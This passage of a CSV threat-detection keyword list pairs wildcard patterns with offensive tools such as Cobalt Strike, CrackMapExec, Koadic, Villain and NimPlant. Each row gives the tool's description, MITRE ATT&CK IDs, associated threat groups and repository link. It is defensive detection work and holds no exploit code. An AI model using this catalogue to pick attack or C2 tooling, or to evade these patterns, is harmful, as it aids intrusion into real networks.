C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Cmd-Inline-Execute.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*cmdinspector OFF*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*cmdinspector ON*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*cmdshell *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Cmd-Shinject.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Cmd-Upload.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*cme -d * -*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme -d *localhost*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme*-macOS-latest-*","offensive_tool_keyword","crackmapexec","macOS default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme*-ubuntu-latest-*","offensive_tool_keyword","crackmapexec","ubuntu default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme*-windows-latest-*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme/cme.conf*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme_bloodhound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_dfscoerce_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_get-desc-users_pass_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_get-desc-users_pass_results*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_gpp_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_ldap-checker_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_MachineAccountQuota_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_ms17-010_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_mssql_priv_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_ntlmv1_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_passpol_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_petitpotam_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_printnightmare_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_runasppl_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_shadowcoerce_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_smb_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_smbsigning_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_subnets_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_trusted-for-delegation_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_users_auth_ldap_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_users_auth_smb_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_users_nullsess_smb_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_webdav_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_zerologon_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme-macOS-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme-ubuntu-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme-windows-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cmpivot.py*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" +"*cms400net_default_userpass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmVmbGVjdGl2ZQ==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*CN=DcRat Server*OU=qwqdanchun*O=DcRat By qwqdanchun*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*CN=PortSwigger*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*CN=ShadowSpray*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*cnotin/SplunkWhisperer2*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*Coalfire-Research*","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Coalfire-Research","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Coalfire-Research/Slackor*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*Cobalt Strike external C2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*Cobalt Strike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltclip.cna*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*cobaltclip.exe*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*cobaltstrike *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltstrike*","offensive_tool_keyword","cobaltstrike","cobaltstrike binary for windows - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations. these assessments benefit security operations and incident response.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 